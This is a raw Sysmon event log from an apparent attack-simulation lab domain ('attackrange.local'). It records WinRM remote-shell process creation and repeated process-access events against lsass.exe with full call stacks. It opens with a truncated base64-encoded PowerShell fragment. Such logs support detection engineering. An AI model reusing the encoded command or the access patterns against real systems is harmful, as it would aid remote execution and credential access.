BCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.954{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.954{D28789B6-7C64-5FA1-1500-000000008801}13361656C:\Windows\system32\svchost.exe{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.954{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-A000-000000008801}4636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.938{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.922{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.922{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.937{D28789B6-7CA9-5FA1-9F00-000000008801}4960C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.922{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.922{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.922{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.860{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C: